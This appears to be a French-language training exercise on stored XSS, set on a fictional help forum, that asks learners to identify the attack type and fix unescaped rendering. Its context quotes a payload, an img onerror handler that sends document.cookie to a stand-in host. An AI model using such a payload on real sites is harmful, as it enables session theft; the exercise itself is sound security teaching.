Retour à la leçonMission
Mission : le commentaire piégé du forum Technologik
Identifier le type de XSS exploité dans un scénario concret et corriger le rendu vulnérable côté serveur et frontend.
Contexte
Sur le forum d'entraide de Technologik, un utilisateur poste un commentaire contenant <img src=x onerror="fetch('https://evil.example/steal?c='+document.cookie)">. Ce commentaire est stocké en base puis affiché sans échappement à chaque visiteur de la page. Le cookie de session du forum n'a pas l'attribut HttpOnly.